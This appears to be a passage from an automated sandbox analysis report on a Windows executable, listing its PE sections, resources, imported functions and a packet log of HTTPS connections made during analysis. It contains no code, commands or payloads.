IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6457	0x6600	False	0.6682368259803921	data	6.434985703212657	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1380	0x1400	False	0.4625	data	5.2610038973135005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25538	0x600	False	0.4635416666666667	data	4.133728555004788	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x30000	0x11000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x41000	0x10f00	0x11000	False	0.8285989200367647	data	7.4569198018255936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x41328	0xaaea	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9973259587694839
RT_ICON	0x4be18	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5030082987551867
RT_ICON	0x4e3c0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5429174484052532
RT_ICON	0x4f468	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.6111407249466951
RT_ICON	0x50310	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7572202166064982
RT_ICON	0x50bb8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.5953757225433526
RT_ICON	0x51120	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7154255319148937
RT_DIALOG	0x51588	0x100	data	English	United States	0.5234375
RT_DIALOG	0x51688	0xf8	data	English	United States	0.6330645161290323
RT_DIALOG	0x51780	0xa0	data	English	United States	0.6125
RT_DIALOG	0x51820	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x51880	0x68	data	English	United States	0.6923076923076923
RT_VERSION	0x518e8	0x214	data	English	United States	0.5169172932330827
RT_MANIFEST	0x51b00	0x3fe	XML 1.0 document, ASCII text, with very long lines (1022), with no line terminators	English	United States	0.5117416829745597

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 7, 2023 09:31:04.884334087 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:04.884418964 CEST	443	49758	142.251.2.102	192.168.2.7
Sep 7, 2023 09:31:04.884602070 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:04.899595022 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:04.899663925 CEST	443	49758	142.251.2.102	192.168.2.7
Sep 7, 2023 09:31:05.338037014 CEST	443	49758	142.251.2.102	192.168.2.7
Sep 7, 2023 09:31:05.338167906 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:05.338958025 CEST	443	49758	142.251.2.102	192.168.2.7
Sep 7, 2023 09:31:05.339037895 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:05.543788910 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:05.543898106 CEST	443	49758	142.251.2.102	192.168.2.7
Sep 7, 2023 09:31:05.544744968 CEST	443	49758	142.251.2.102	192.168.2.7
Sep 7, 2023 09:31:05.544843912 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:05.547723055 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:05.591487885 CEST	443	49758	142.251.2.102	192.168.2.7
Sep 7, 2023 09:31:06.116417885 CEST	443	49758	142.251.2.102	192.168.2.7
Sep 7, 2023 09:31:06.116606951 CEST	443	49758	142.251.2.102	192.168.2.7
Sep 7, 2023 09:31:06.116715908 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:06.116868019 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:06.117063046 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:06.117094994 CEST	443	49758	142.251.2.102	192.168.2.7
Sep 7, 2023 09:31:06.117125034 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:06.117191076 CEST	49758	443	192.168.2.7	142.251.2.102
Sep 7, 2023 09:31:06.332637072 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:06.332691908 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:06.332842112 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:06.333997965 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:06.334028959 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:06.774630070 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:06.774863005 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:06.775587082 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:06.775721073 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:06.782879114 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:06.782922029 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:06.783313036 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:06.783412933 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:06.784245968 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:06.827493906 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.575438023 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.575782061 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.575835943 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.575973034 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.603883982 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.604146957 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.633188009 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.633359909 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.647778988 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.648039103 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.662631035 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.662902117 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.662946939 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.663042068 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.677259922 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.677431107 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.677483082 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.677575111 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.778553009 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.778925896 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.778960943 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.779027939 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.785340071 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.785481930 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.785509109 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.785597086 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.800070047 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.800199986 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.800223112 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.800268888 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.814802885 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.814958096 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.814982891 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.815036058 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.829576969 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.829703093 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.829725981 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.829768896 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.844216108 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.844326019 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.844350100 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.844400883 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.858962059 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.859126091 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.859150887 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.859211922 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.873575926 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.873704910 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.873723030 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.873783112 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.888289928 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.888396978 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.895585060 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.895656109 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.895673037 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.895723104 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.910089016 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.910257101 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.910274982 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.910342932 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.923409939 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.923480988 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.923500061 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.923563004 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.923573971 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.923619986 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.935849905 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.935914993 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.935935020 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.935992956 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.948302984 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.948399067 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.948415995 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.948467016 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.962510109 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.962615013 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.962634087 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.962690115 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.973076105 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.973185062 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.973202944 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.973273993 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.985538006 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.985724926 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.985743046 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.985800982 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.997932911 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.998060942 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:07.998078108 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:07.998131037 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.010430098 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.010524035 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.010538101 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.010585070 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.018440008 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.018552065 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.018567085 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.018615007 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.026132107 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.026274920 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.026304960 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.026360989 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.033658028 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.033849001 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.037946939 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.038110971 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.038147926 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.038227081 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.045223951 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.045367956 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.045392990 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.045463085 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.052789927 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.052953005 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.052974939 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.053037882 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.060345888 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.060470104 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.060494900 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.060554981 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.067996025 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.068094015 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.068114996 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.068192005 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.075568914 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.075675011 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.075691938 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.075743914 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.083836079 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.083951950 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.083976984 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.084038973 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.090797901 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.090925932 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.090950012 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.091001034 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.098404884 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.098526001 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.098545074 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.098612070 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.105935097 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.106043100 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.106053114 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.106108904 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.113533020 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.113621950 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.113632917 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.113681078 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.121186018 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.121263981 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.121277094 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.121319056 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.128756046 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.128839970 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.132592916 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.132719040 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.132731915 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.132782936 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.140254021 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.140353918 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.140368938 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.140419960 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.147937059 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.148022890 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.148032904 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.148078918 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.155441046 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.155524015 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.155536890 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.155580997 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.155589104 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.155627012 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.163064957 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.163161039 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.163180113 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.163225889 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.170644999 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.170736074 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.170763016 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.170811892 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.178345919 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.178443909 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.178459883 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.178509951 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.185568094 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.185781002 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.185802937 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.185879946 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.192958117 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.193130016 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.193149090 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.193233013 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.200004101 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.200119972 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.200138092 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.200200081 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.206906080 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.207029104 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.207046986 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.207103968 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.213788986 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.213896036 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.213911057 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.213965893 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.220472097 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.220593929 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.223953009 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.224081993 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.224095106 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.224153042 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.230616093 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.230741978 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.230758905 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.230828047 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.237211943 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.237333059 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.237355947 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.237418890 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.241991043 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.242110014 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.242121935 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.242185116 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.246699095 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.246802092 CEST	49759	443	192.168.2.7	142.251.2.132
